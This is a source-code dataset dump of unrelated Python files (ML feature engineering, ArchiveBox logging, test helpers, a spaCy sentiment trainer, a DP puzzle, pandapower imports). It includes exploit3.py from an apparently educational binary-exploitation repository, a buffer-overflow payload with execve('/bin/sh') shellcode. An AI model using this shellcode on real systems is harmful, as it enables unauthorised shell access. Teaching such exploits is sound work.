df, predictors_tmp = merge_feat_nunique(df, df_wa, ['uid'], 'wa_name', 'nunique_waName_gb_uid_in_wa'); predictors += predictors_tmp
col_list = ['visit_cnt', 'visit_dura', 'up_flow', 'down_flow']
for i in col_list:
df, predictors_tmp = merge_feat_min(df, df_wa, ['uid'], i, 'min_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_max(df, df_wa, ['uid'], i, 'max_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_mean(df, df_wa, ['uid'], i, 'mean_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
train_x = df.loc[:(train_len - 1), predictors]
train_y = df.loc[:(train_len - 1), target]
test_x = df.loc[train_len:, predictors]
########################################### LightGBM ###########################################
config_lgb = {
'rounds': 10000,
'folds': 5
}
params_lgb = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'num_leaves': 63,
'learning_rate': 0.06,
'feature_fraction': 0.8,
'bagging_fraction': 0.8,
'bagging_freq': 1,
# 'min_sum_hessian_in_leaf': 10,
'verbosity': 5,
'num_threads': cpu_count() - 1,
'seed': 7,
}
# lgb_cv(train_x, train_y, params_lgb, config_lgb['rounds'], config_lgb['folds'])
model_lgb, pred_lgb = lgb_train_predict(train_x, train_y, test_x, params_lgb, 90)
result = store_result(test.uid, pred_lgb, threshold, '20180523-lgb-%d-%d(r%d)' % (7742, 9098, 90))
result = store_result(test.uid, pred_lgb, threshold, 'submission')
imp = pd.DataFrame({'feature':train_x.columns.values, 'importance':list(model_lgb.feature_importance())})
imp = imp.sort_values(by = 'importance', ascending = False)
imp.to_csv(ROOT_PATH + 'data/output/feat_imp/imp-20180523-%d-%d(r%d).csv' % (7700, 9102, 90), index=False)
| 3,735 | 0 | 253 |
4dc2c05150b71590453542cfcd0e517e57e240e9 | 6,578 | py | Python | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 2 | 2019-10-17T00:42:41.000Z | 2020-11-05T22:41:22.000Z | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 59 | 2019-09-25T06:15:31.000Z | 2021-07-21T05:29:52.000Z | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 1 | 2019-10-22T19:23:21.000Z | 2019-10-22T19:23:21.000Z | import sys
from datetime import datetime
from config import ANSI, REPO_DIR, OUTPUT_DIR
# globals are bad, mmkay
_LAST_RUN_STATS = {
'skipped': 0,
'succeeded': 0,
'failed': 0,
'parsing_start_ts': 0,
'parsing_end_ts': 0,
'indexing_start_ts': 0,
'indexing_end_ts': 0,
'archiving_start_ts': 0,
'archiving_end_ts': 0,
'links': {},
}
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
### Parsing Stage
### Indexing Stage
### Archiving Stage
def log_archive_method_finished(result):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
required_keys = ('cmd', 'pwd', 'output', 'status', 'start_ts', 'end_ts')
assert (
isinstance(result, dict)
and all(key in result for key in required_keys)
and ('output' in result)
), 'Archive method did not return a valid result.'
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result['cmd']
)
if result['status'] == 'failed':
# Prettify error output hints string and limit to five lines
hints = getattr(result['output'], 'hints', None) or ()
if hints:
hints = hints if isinstance(hints, (list, tuple)) else hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
'{}Failed:{} {}{}'.format(
ANSI['red'],
result['output'].__class__.__name__.replace('ArchiveError', ''),
result['output'],
ANSI['reset']
),
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
' cd {};'.format(result['pwd']),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
| 32.564356 | 108 | 0.574187 | import sys
from datetime import datetime
from config import ANSI, REPO_DIR, OUTPUT_DIR
# globals are bad, mmkay
_LAST_RUN_STATS = {
'skipped': 0,
'succeeded': 0,
'failed': 0,
'parsing_start_ts': 0,
'parsing_end_ts': 0,
'indexing_start_ts': 0,
'indexing_end_ts': 0,
'archiving_start_ts': 0,
'archiving_end_ts': 0,
'links': {},
}
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
### Parsing Stage
def log_parsing_started(source_file):
start_ts = datetime.now()
_LAST_RUN_STATS['parse_start_ts'] = start_ts
print('{green}[*] [{}] Parsing new links from output/sources/{}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
source_file.rsplit('/', 1)[-1],
**ANSI,
))
def log_parsing_finished(num_new_links, parser_name):
print(' > Adding {} new links to index (parsed import as {})'.format(
num_new_links,
parser_name,
))
### Indexing Stage
def log_indexing_process_started():
start_ts = datetime.now()
_LAST_RUN_STATS['index_start_ts'] = start_ts
print('{green}[*] [{}] Saving main index files...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
**ANSI,
))
def log_indexing_started(out_dir, out_file):
sys.stdout.write(' > {}/{}'.format(pretty_path(out_dir), out_file))
def log_indexing_finished(out_dir, out_file):
end_ts = datetime.now()
_LAST_RUN_STATS['index_end_ts'] = end_ts
print('\r √ {}/{}'.format(pretty_path(out_dir), out_file))
### Archiving Stage
def log_archiving_started(num_links, resume):
start_ts = datetime.now()
_LAST_RUN_STATS['start_ts'] = start_ts
if resume:
print('{green}[▶] [{}] Resuming archive updating for {} pages starting from {}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
resume,
**ANSI,
))
else:
print('{green}[▶] [{}] Updating content for {} pages in archive...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_archiving_paused(num_links, idx, timestamp):
end_ts = datetime.now()
_LAST_RUN_STATS['end_ts'] = end_ts
print()
print('\n{lightyellow}[X] [{now}] Downloading paused on link {timestamp} ({idx}/{total}){reset}'.format(
**ANSI,
now=end_ts.strftime('%Y-%m-%d %H:%M:%S'),
idx=idx+1,
timestamp=timestamp,
total=num_links,
))
print(' To view your archive, open: {}/index.html'.format(OUTPUT_DIR.replace(REPO_DIR + '/', '')))
print(' Continue where you left off by running:')
print(' {} {}'.format(
pretty_path(sys.argv[0]),
timestamp,
))
def log_archiving_finished(num_links):
end_ts = datetime.now()
_LAST_RUN_STATS['end_ts'] = end_ts
seconds = end_ts.timestamp() - _LAST_RUN_STATS['start_ts'].timestamp()
if seconds > 60:
duration = '{0:.2f} min'.format(seconds / 60, 2)
else:
duration = '{0:.2f} sec'.format(seconds, 2)
print('{}[√] [{}] Update of {} pages complete ({}){}'.format(
ANSI['green'],
end_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
duration,
ANSI['reset'],
))
print(' - {} links skipped'.format(_LAST_RUN_STATS['skipped']))
print(' - {} links updated'.format(_LAST_RUN_STATS['succeeded']))
print(' - {} links had errors'.format(_LAST_RUN_STATS['failed']))
print(' To view your archive, open: {}/index.html'.format(OUTPUT_DIR.replace(REPO_DIR + '/', '')))
def log_link_archiving_started(link_dir, link, is_new):
# [*] [2019-03-22 13:46:45] "Log Structured Merge Trees - ben stopford"
# http://www.benstopford.com/2015/02/14/log-structured-merge-trees/
# > output/archive/1478739709
print('\n[{symbol_color}{symbol}{reset}] [{symbol_color}{now}{reset}] "{title}"'.format(
symbol_color=ANSI['green' if is_new else 'black'],
symbol='+' if is_new else '*',
now=datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
title=link['title'] or link['url'],
**ANSI,
))
print(' {blue}{url}{reset}'.format(url=link['url'], **ANSI))
print(' {} {}'.format(
'>' if is_new else '√',
pretty_path(link_dir),
))
def log_link_archiving_finished(link_dir, link, is_new, stats):
total = sum(stats.values())
if stats['failed'] > 0 :
_LAST_RUN_STATS['failed'] += 1
elif stats['skipped'] == total:
_LAST_RUN_STATS['skipped'] += 1
else:
_LAST_RUN_STATS['succeeded'] += 1
def log_archive_method_started(method):
print(' > {}'.format(method))
def log_archive_method_finished(result):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
required_keys = ('cmd', 'pwd', 'output', 'status', 'start_ts', 'end_ts')
assert (
isinstance(result, dict)
and all(key in result for key in required_keys)
and ('output' in result)
), 'Archive method did not return a valid result.'
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result['cmd']
)
if result['status'] == 'failed':
# Prettify error output hints string and limit to five lines
hints = getattr(result['output'], 'hints', None) or ()
if hints:
hints = hints if isinstance(hints, (list, tuple)) else hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
'{}Failed:{} {}{}'.format(
ANSI['red'],
result['output'].__class__.__name__.replace('ArchiveError', ''),
result['output'],
ANSI['reset']
),
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
' cd {};'.format(result['pwd']),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
| 4,000 | 0 | 253 |
b0b4f8e45c3a89e33030d8d4505d5c8ac2abe457 | 2,054 | py | Python | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 1 | 2021-12-14T23:43:35.000Z | 2021-12-14T23:43:35.000Z | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 195 | 2021-09-16T05:47:18.000Z | 2022-03-31T22:03:15.000Z | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | null | null | null | from typing import Hashable, List, Tuple, Mapping
import contextlib
import pytest
import numpy as np
import joblib
import xarray
import io
@contextlib.contextmanager
def no_warning(*args):
"""Raise error if any errors occur. Takes the same arguments as
``pytest.warns``.
Example:
>>> import warnings
>>> from vcm.testing import no_warning
>>> with no_warning(UserWarning):
... warnings.warn(UserWarning("A warning"))
...
Traceback (most recent call last):
File "<ipython-input-9-c178a20fa539>", line 2, in <module>
warnings.warn(UserWarning("A warning"))
File "/Users/noah/.pyenv/versions/miniconda3-latest/envs/fv3net/lib/python3.7/contextlib.py", line 119, in __exit__
next(self.gen)
File "/Users/noah/workspace/fv3net/external/vcm/vcm/testing.py", line 14, in no_warning
assert len(record) == 0
AssertionError
""" # noqa
with pytest.warns(*args) as record:
yield
assert len(record) == 0
def checksum_dataarray_mapping(
d: Mapping[Hashable, xarray.DataArray]
) -> List[Tuple[Hashable, str]]:
"""Checksum a mapping of datarrays
Returns:
sorted list of (key, hash) combinations. This is sorted to simplify
regression testing.
"""
sorted_keys = sorted(d.keys())
return [(key, checksum_dataarray(d[key])) for key in sorted_keys]
| 28.527778 | 123 | 0.643135 | from typing import Hashable, List, Tuple, Mapping
import contextlib
import pytest
import numpy as np
import joblib
import xarray
import io
@contextlib.contextmanager
def no_warning(*args):
"""Raise error if any errors occur. Takes the same arguments as
``pytest.warns``.
Example:
>>> import warnings
>>> from vcm.testing import no_warning
>>> with no_warning(UserWarning):
... warnings.warn(UserWarning("A warning"))
...
Traceback (most recent call last):
File "<ipython-input-9-c178a20fa539>", line 2, in <module>
warnings.warn(UserWarning("A warning"))
File "/Users/noah/.pyenv/versions/miniconda3-latest/envs/fv3net/lib/python3.7/contextlib.py", line 119, in __exit__
next(self.gen)
File "/Users/noah/workspace/fv3net/external/vcm/vcm/testing.py", line 14, in no_warning
assert len(record) == 0
AssertionError
""" # noqa
with pytest.warns(*args) as record:
yield
assert len(record) == 0
def checksum_dataarray(xobj) -> str:
return joblib.hash(np.asarray(xobj))
def checksum_dataarray_mapping(
d: Mapping[Hashable, xarray.DataArray]
) -> List[Tuple[Hashable, str]]:
"""Checksum a mapping of datarrays
Returns:
sorted list of (key, hash) combinations. This is sorted to simplify
regression testing.
"""
sorted_keys = sorted(d.keys())
return [(key, checksum_dataarray(d[key])) for key in sorted_keys]
def regression_data(
array: xarray.DataArray, attrs: bool = True, coords: bool = True
) -> str:
f = io.StringIO()
print("Array hash:", file=f)
print(checksum_dataarray(array), file=f)
if coords:
print("Coordinate info:", file=f)
for coord in array.coords:
print("Coordinate ", coord, ":", np.asarray(array[coord]), file=f)
if attrs:
print("CDL Description of Data:")
# This ensures the metadata is correct
array.to_dataset(name="a").info(f)
return f.getvalue()
| 575 | 0 | 46 |
f3c271325f8cb951926682f322a1c0dd15800adb | 142 | py | Python | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
] | null | null | null | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
] | null | null | null | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
] | null | null | null | nome=input("Digite seu nome:")
idade=int(input("Digite sua idade:"))
sexo=input("Digite seu sexo [m/f]:")
tupla=(nome,idade,sexo)
print(tupla) | 28.4 | 37 | 0.711268 | nome=input("Digite seu nome:")
idade=int(input("Digite sua idade:"))
sexo=input("Digite seu sexo [m/f]:")
tupla=(nome,idade,sexo)
print(tupla) | 0 | 0 | 0 |
adca1b751b37f0f6ccdcc090e92f6071104cc127 | 6,844 | py | Python | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | """Structure for model trainer loosely taken from https://realpython.com/sentiment-analysis-python mainly for guide on spacy.
dataset used is from https://ai.stanford.edu/~amaas/data/sentiment/
using version 2.3.5 of spacy as version 3 includes api issues when trying to use en cor web sm
"""
import os
from random import shuffle
import numpy as np
import spacy
import pickle
from spacy.util import minibatch, compounding
from spacy.tokenizer import Tokenizer
from spacy.pipeline import Morphologizer
import csv
def format_training_data(direc: str = "data/training/aclImdb/train") -> None:
"""
Loads the training data from file_directory and stores the data into a pickle file
Do not run if you have not downloaded and extracted the files from the downloadable tar.gz
"""
reviews = []
# we have a folder of positive reviews and negative reviews so well do two iterations
for cat in ('pos', 'neg'):
# grabs each individual review (each review is stored in its own text file)
for review_direc in filter(lambda j: j[-4:]=='.txt', os.listdir(f'{direc}/{cat}')):
with open(f'{direc}/{cat}/{review_direc}', encoding="Latin-1") as f:
#cleans the text and cattegorizes it
reviews.append((f.read().replace('<br />', r'\n\n').strip(), {'cats':{'pos':'pos'==cat,'neg':'neg'==cat}}))
with open('data/training/movie_reviews_data.pkl', 'wb') as f:
pickle.dump(reviews, f)
def shuffle_training_data(data: list, split: int = .8) -> tuple[list]:
"""
shuffles the data and separates it by split in order to have a
training dataset and a testing dataset. Default is a 4:1 split
as recommended
"""
shuffle(data)
return data[int(len(data)*split):], data[:int(len(data)*split)]
def grab_training_data(shuffle: bool = False, direc: str = 'data/training/movie_reviews_data.pkl') -> tuple[list]:
"""
Opens the reviews stored in the pickle file.
If shuffle is true that means that we should get the data
ready by running shuffle_training_Data
"""
with open(direc, 'rb') as f:
reviews = pickle.load(f)
return shuffle_training_data(reviews) if shuffle else tuple(reviews)
def save_model(nlp, optimizer, training_data, test_data, directory: str= 'models/sentiment/model_artifacts') -> None:
"""saves the given model"""
with nlp.use_params(optimizer.averages):
nlp.to_disk(directory)
print(f"Model Saved to {directory}")
def train_model(training_data: list[tuple], test_data: list[tuple], count: int):
"""
Trains model given training data. Code structure taken from https://realpython.com/sentiment-analysis-python
Changes were made due to some efficiency issues, unclear code, and outdated uses of APIs and libraries
"""
results_txt = []
nlp = spacy.load("en_core_web_sm") # for en_core_web_sm legacy issue, pip3 install:
# https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz
# morphologizer documentation: https://spacy.io/api/morphologizer#add_label
if "textcat" not in nlp.pipe_names:
nlp.add_pipe(nlp.create_pipe("textcat", config={"architecture": "simple_cnn"}), last=True)
textcat = nlp.get_pipe("textcat")
textcat.add_label("pos")
textcat.add_label("neg")
with open('models/sentiment/models/test_data.pkl', 'wb') as f:
pickle.dump(test_data, f)
# code to exclude useless pipes from training
with nlp.disable_pipes([pipe for pipe in nlp.pipe_names if pipe!="textcat"]):
optimizer = nlp.begin_training()
batch_sizes = compounding(4.0, 32.0, 1.001)
for i in range(count):
shuffle(training_data)
batches, loss = minibatch(training_data, size = batch_sizes), {}
for batch in batches:
text, labels = zip(*batch) # batch is in the form [(text,label)] so we zip* and get a list for each
nlp.update(text, labels, drop=.2, sgd=optimizer, losses = loss)
with textcat.model.use_params(optimizer.averages):
results = evaluate_model(nlp.tokenizer, textcat, test_data)
txt_wrp = f'Model #{i+1}/{count}: Precision: {results["precision"]}, Recall: {results["recall"]}, F-Score: {results["f-score"]}, loss:{loss["textcat"]}.'
print(txt_wrp,end=' ')
results_txt.append(txt_wrp)
write_data_to_csv(results, loss, i)
# uncomment to save model "BE CAREFUL MAY DESTROY PREVIOUS MODEL"
save_model(nlp, optimizer, training_data, test_data, f'models/sentiment/models/model{i+1}')
with open('models/sentiment/results.txt', 'w') as f:
for result in results_txt:
f.write(result+'\n')
def evaluate_model(tokenizer: Tokenizer, textcat: Morphologizer, test_data: list) -> dict:
"""
evaluate the model to see if it is worthwhile to save the model
"""
true_positives = true_negatives = 0
false_positives = false_negatives = 1e-8 # near 0 to avoid /0 $$ textcat.pipe(tokenizer(x[0])).cats['pos'],
tokens, labels = zip(*map(lambda x: (tokenizer(x[0]), x[1]['cats']), test_data))
for score, true_label in zip([i.cats['pos'] for i in textcat.pipe(tokens)], labels):
if score >= 0.5 and true_label["pos"]:
true_positives += 1
elif score >= 0.5 and true_label["neg"]:
false_positives += 1
elif score < 0.5 and true_label["neg"]:
true_negatives += 1
elif score < 0.5 and true_label["pos"]:
false_negatives += 1
precision = true_positives / (true_positives + false_positives)
recall = true_positives / (true_positives + false_negatives)
f_score = 2 * (precision * recall) / (precision + recall) if precision + recall else 0
return {"precision": precision, "recall": recall, "f-score": f_score}
if __name__ == "__main__":
# Uncomment to retrain models
# DISCLAIMER: takes hours and overwrites other files
data = grab_training_data(True)
# train_model(data[0], data[1], 25)
| 43.044025 | 165 | 0.654004 | """Structure for model trainer loosely taken from https://realpython.com/sentiment-analysis-python mainly for guide on spacy.
dataset used is from https://ai.stanford.edu/~amaas/data/sentiment/
using version 2.3.5 of spacy as version 3 includes api issues when trying to use en cor web sm
"""
import os
from random import shuffle
import numpy as np
import spacy
import pickle
from spacy.util import minibatch, compounding
from spacy.tokenizer import Tokenizer
from spacy.pipeline import Morphologizer
import csv
def format_training_data(direc: str = "data/training/aclImdb/train") -> None:
"""
Loads the training data from file_directory and stores the data into a pickle file
Do not run if you have not downloaded and extracted the files from the downloadable tar.gz
"""
reviews = []
# we have a folder of positive reviews and negative reviews so well do two iterations
for cat in ('pos', 'neg'):
# grabs each individual review (each review is stored in its own text file)
for review_direc in filter(lambda j: j[-4:]=='.txt', os.listdir(f'{direc}/{cat}')):
with open(f'{direc}/{cat}/{review_direc}', encoding="Latin-1") as f:
#cleans the text and cattegorizes it
reviews.append((f.read().replace('<br />', r'\n\n').strip(), {'cats':{'pos':'pos'==cat,'neg':'neg'==cat}}))
with open('data/training/movie_reviews_data.pkl', 'wb') as f:
pickle.dump(reviews, f)
def shuffle_training_data(data: list, split: int = .8) -> tuple[list]:
"""
shuffles the data and separates it by split in order to have a
training dataset and a testing dataset. Default is a 4:1 split
as recommended
"""
shuffle(data)
return data[int(len(data)*split):], data[:int(len(data)*split)]
def grab_training_data(shuffle: bool = False, direc: str = 'data/training/movie_reviews_data.pkl') -> tuple[list]:
"""
Opens the reviews stored in the pickle file.
If shuffle is true that means that we should get the data
ready by running shuffle_training_Data
"""
with open(direc, 'rb') as f:
reviews = pickle.load(f)
return shuffle_training_data(reviews) if shuffle else tuple(reviews)
def save_model(nlp, optimizer, training_data, test_data, directory: str= 'models/sentiment/model_artifacts') -> None:
"""saves the given model"""
with nlp.use_params(optimizer.averages):
nlp.to_disk(directory)
print(f"Model Saved to {directory}")
def train_model(training_data: list[tuple], test_data: list[tuple], count: int):
"""
Trains model given training data. Code structure taken from https://realpython.com/sentiment-analysis-python
Changes were made due to some efficiency issues, unclear code, and outdated uses of APIs and libraries
"""
results_txt = []
nlp = spacy.load("en_core_web_sm") # for en_core_web_sm legacy issue, pip3 install:
# https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz
# morphologizer documentation: https://spacy.io/api/morphologizer#add_label
if "textcat" not in nlp.pipe_names:
nlp.add_pipe(nlp.create_pipe("textcat", config={"architecture": "simple_cnn"}), last=True)
textcat = nlp.get_pipe("textcat")
textcat.add_label("pos")
textcat.add_label("neg")
with open('models/sentiment/models/test_data.pkl', 'wb') as f:
pickle.dump(test_data, f)
# code to exclude useless pipes from training
with nlp.disable_pipes([pipe for pipe in nlp.pipe_names if pipe!="textcat"]):
optimizer = nlp.begin_training()
batch_sizes = compounding(4.0, 32.0, 1.001)
for i in range(count):
shuffle(training_data)
batches, loss = minibatch(training_data, size = batch_sizes), {}
for batch in batches:
text, labels = zip(*batch) # batch is in the form [(text,label)] so we zip* and get a list for each
nlp.update(text, labels, drop=.2, sgd=optimizer, losses = loss)
with textcat.model.use_params(optimizer.averages):
results = evaluate_model(nlp.tokenizer, textcat, test_data)
txt_wrp = f'Model #{i+1}/{count}: Precision: {results["precision"]}, Recall: {results["recall"]}, F-Score: {results["f-score"]}, loss:{loss["textcat"]}.'
print(txt_wrp,end=' ')
results_txt.append(txt_wrp)
write_data_to_csv(results, loss, i)
# uncomment to save model "BE CAREFUL MAY DESTROY PREVIOUS MODEL"
save_model(nlp, optimizer, training_data, test_data, f'models/sentiment/models/model{i+1}')
with open('models/sentiment/results.txt', 'w') as f:
for result in results_txt:
f.write(result+'\n')
def evaluate_model(tokenizer: Tokenizer, textcat: Morphologizer, test_data: list) -> dict:
"""
evaluate the model to see if it is worthwhile to save the model
"""
true_positives = true_negatives = 0
false_positives = false_negatives = 1e-8 # near 0 to avoid /0 $$ textcat.pipe(tokenizer(x[0])).cats['pos'],
tokens, labels = zip(*map(lambda x: (tokenizer(x[0]), x[1]['cats']), test_data))
for score, true_label in zip([i.cats['pos'] for i in textcat.pipe(tokens)], labels):
if score >= 0.5 and true_label["pos"]:
true_positives += 1
elif score >= 0.5 and true_label["neg"]:
false_positives += 1
elif score < 0.5 and true_label["neg"]:
true_negatives += 1
elif score < 0.5 and true_label["pos"]:
false_negatives += 1
precision = true_positives / (true_positives + false_positives)
recall = true_positives / (true_positives + false_negatives)
f_score = 2 * (precision * recall) / (precision + recall) if precision + recall else 0
return {"precision": precision, "recall": recall, "f-score": f_score}
def write_data_to_csv(data: dict, loss: dict , count: int, csv_direc: str = 'models/sentiment/evaluations.csv') -> None:
new_row = [count, loss['textcat'], data['precision'], data['recall'], data['f-score']]
if not count:
fields = ["MODEL NUMBER", "LOSS", "PRECISION", "RECALL", "F-SCORE"]
with open(csv_direc, 'w', newline='') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow(fields)
csvwriter.writerow(new_row)
else:
with open(csv_direc, 'a', newline='') as csvfile:
csvwriter = csv.writer(csvfile)
csvwriter.writerow(new_row)
if __name__ == "__main__":
# Uncomment to retrain models
# DISCLAIMER: takes hours and overwrites other files
data = grab_training_data(True)
# train_model(data[0], data[1], 25)
| 622 | 0 | 23 |
46067aa1f219db59d6e7a1fd9908d08cbd9fc4da | 443 | py | Python | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python2
import struct
padding = 'A'*28
#Address used with gdb
#shellcode_addr = struct.pack("I", 0xffffd040)
#Address used for exploit
shellcode_addr = struct.pack("I", 0xffffd0b0)
#Source: https://www.exploit-db.com/shellcodes/46809
#execve("/bin/sh", NULL, NULL)
shellcode = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
exploit = padding + shellcode_addr + shellcode
print exploit
| 22.15 | 94 | 0.733634 | #!/usr/bin/env python2
import struct
padding = 'A'*28
#Address used with gdb
#shellcode_addr = struct.pack("I", 0xffffd040)
#Address used for exploit
shellcode_addr = struct.pack("I", 0xffffd0b0)
#Source: https://www.exploit-db.com/shellcodes/46809
#execve("/bin/sh", NULL, NULL)
shellcode = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
exploit = padding + shellcode_addr + shellcode
print exploit
| 0 | 0 | 0 |
985f29411a166562fbd25509052b0da7b3013412 | 1,253 | py | Python | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | 79 | 2018-03-27T12:37:49.000Z | 2022-01-21T10:18:17.000Z | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | null | null | null | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | 27 | 2018-04-08T03:07:06.000Z | 2021-10-30T00:01:50.000Z | """
给定一个二维数组map,含义是一张地图,例如,如下矩阵:
-2 -3 3
-5 -10 1
0 30 -5
游戏规则如下:
(1)骑士从左上角出发,每次只能向右或者向下走,最后到达右下角见到公主。
(2)地图中每个位置的值代表骑士要遭遇的事情。如果是负数,说明此处有怪兽,
要让骑士掉血。如果是非负数,则代表此处有血瓶,能让骑士回血。
(3)骑士从左上角到右下角的过程中,走到任何一个位置,血量都不能少于1.
为了保证骑士能见到公主,初始血量至少是多少?根据map,返回初始血量。
"""
if __name__ == '__main__':
my_map = [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]
print(DungenonGame.get_min_hp(my_map)) | 27.23913 | 84 | 0.533919 | """
给定一个二维数组map,含义是一张地图,例如,如下矩阵:
-2 -3 3
-5 -10 1
0 30 -5
游戏规则如下:
(1)骑士从左上角出发,每次只能向右或者向下走,最后到达右下角见到公主。
(2)地图中每个位置的值代表骑士要遭遇的事情。如果是负数,说明此处有怪兽,
要让骑士掉血。如果是非负数,则代表此处有血瓶,能让骑士回血。
(3)骑士从左上角到右下角的过程中,走到任何一个位置,血量都不能少于1.
为了保证骑士能见到公主,初始血量至少是多少?根据map,返回初始血量。
"""
class DungenonGame:
@classmethod
def get_min_hp(cls, m):
if not m:
return 1
len1 = len(m)
len2 = len(m[0])
dp = [[0 for _ in range(len2)] for _ in range(len1)]
dp[len1-1][len2-1] = 1 if m[len1-1][len2-1] >= 0 else -m[len1-1][len2-1] + 1
for rows in range(len1-2, -1, -1):
dp[rows][len2-1] = max([dp[rows+1][len2-1]-m[rows][len2-1], 1])
rows += 1
for cols in range(len2-2, -1, -1):
dp[len1-1][cols] = max([dp[len1-1][cols+1]-m[len1-1][cols], 1])
cols += 1
for rows in range(len1-2, -1, -1):
for cols in range(len2 - 2, -1, -1):
down = max(dp[rows+1][cols]-m[rows][cols], 1)
right = max(dp[rows][cols+1]-m[rows][cols], 1)
dp[rows][cols] = min(down, right)
return dp[0][0]
if __name__ == '__main__':
my_map = [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]
print(DungenonGame.get_min_hp(my_map)) | 811 | 41 | 23 |
f4190354b682afdd25419c77b14e1ec356a5d810 | 6,060 | py | Python | pandapower/plotting/plotly/vlevel_plotly.py | suzannejanssen/pandapower | 8d0d422c28924c85e774e0e357e4abff86ff3c55 | [
"BSD-3-Clause"
] | 1 | 2020-10-19T06:39:15.000Z | 2020-10-19T06:39:15.000Z | pandapower/plotting/plotly/vlevel_plotly.py | miek770/pandapower | de004efc1b7432a633792af4f551f7635a02db47 | [
"BSD-3-Clause"
] | null | null | null | pandapower/plotting/plotly/vlevel_plotly.py | miek770/pandapower | de004efc1b7432a633792af4f551f7635a02db47 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2016-2018 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pandas as pd
from pandapower.plotting.generic_geodata import create_generic_coordinates
